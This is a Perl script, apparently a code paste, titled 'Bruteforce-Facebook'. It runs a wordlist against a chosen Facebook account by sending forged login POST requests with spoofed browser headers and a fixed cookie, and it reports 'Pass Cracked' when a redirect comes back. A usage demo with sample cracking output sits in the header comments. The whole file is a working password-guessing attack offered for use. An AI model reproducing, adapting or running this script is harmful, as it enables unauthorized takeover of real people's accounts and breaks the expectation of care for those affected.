ss

1. #!/usr/bin/perl
2. #
3. # Bruteforce-Facebook
4.  
5. # Usage:
6. # login could be either a user's email address or profile name
7. #
8. # Module Requirements:
9. #
10. # Install module if missing:
11. # perl -MCPAN -e 'install Net::SSLeay'
12. #
13. # Demo:
14. # perl halakos.pl Facebooklogin@facebook.com wordlist.lst
15. #
16. # [+] Cracking Facebooklogin@facebook.com ...
17. #
18. # [-] test -> Failed
19. # [-] test123 -> Failed
20. # [-] testtest -> Failed
21. # [-] testest123 -> Failed
22. # [-] qwerty -> Failed
23. # [-] azerty -> Failed
24. # [-] password -> Failed
25. # [-] password123 -> Failed
26. #
27. ########################################################
28. # [+] CRACKED! Your password is P@$$W0RD
29. ########################################################
30. #
31.  
32. use strict;
33. use Net::SSLeay::Handle;
34.  
35. if(!defined($ARGV[0] && $ARGV[1])) {
36.  
37. system('clear');
38. print "\n+++ halako password Bruter\n";
39. print "+++ Coded \n";
40. print "+++ www.fb.com/\n\n";
41. print "+++ Usage: perl $0 user wordlist\n\n";
42. exit; }
43.  
44. my $user = $ARGV[0];
45. my $wordlist = $ARGV[1];
46. open (LIST, $wordlist) || die "\n[-] No Wordlist On $wordlist -_- \n";
47.  
48. print "\n+++ \n";
49. print "+++ Coded by \n";
50. print "+++ a\n";
51. print "\n[+] Now Cracking $user ...\n\n";
52. while (my $password = <LIST>) {
53. chomp ($password);
54. $password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg;
55.  
56. my $a = "POST /login.php HTTP/1.1";
57. my $b = "Host: www.facebook.com";
58. my $c = "Connection: close";
59. my $e = "Cache-Control: max-age=0";
60. my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
61. my $g = "Origin: https://www.facebook.com";
62. my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31";
63. my $i = "Content-Type: application/x-www-form-urlencoded";
64. my $j = "Accept-Encoding: gzip,deflate,sdch";
65. my $k = "Accept-Language: en-US,en;q=0.8";
66. my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3";
67.  
68. my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa";
69. my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In";
70. my $cl = length($post);
71. my $d = "Content-Length: $cl";
72.  
73.  
74. my ($host, $port) = ("www.facebook.com", 443);
75.  
76. tie(*SSL, "Net::SSLeay::Handle", $host, $port);
77.  
78.  
79. print SSL "$a\n";
80. print SSL "$b\n";
81. print SSL "$c\n";
82. print SSL "$d\n";
83. print SSL "$e\n";
84. print SSL "$f\n";
85. print SSL "$g\n";
86. print SSL "$h\n";
87. print SSL "$i\n";
88. print SSL "$j\n";
89. print SSL "$k\n";
90. print SSL "$l\n";
91. print SSL "$cookie\n\n";
92.  
93. print SSL "$post\n";
94.  
95. my $success;
96. while(my $result = <SSL>){
97. if($result =~ /Location(.*?)/){
98. $success = $1;
99. }
100. }
101. if (!defined $success)
102. {
103. print "[-] $password -> Not Him :( \n";
104. close SSL;
105. }
106. else
107. {
108. print "\n########################################################\n";
109. print "[+] Yuuup!! Pass Cracked => Pass is $password :D\n";
110. print "########################################################\n\n";
111. close SSL;
112. exit;
113. }
114. }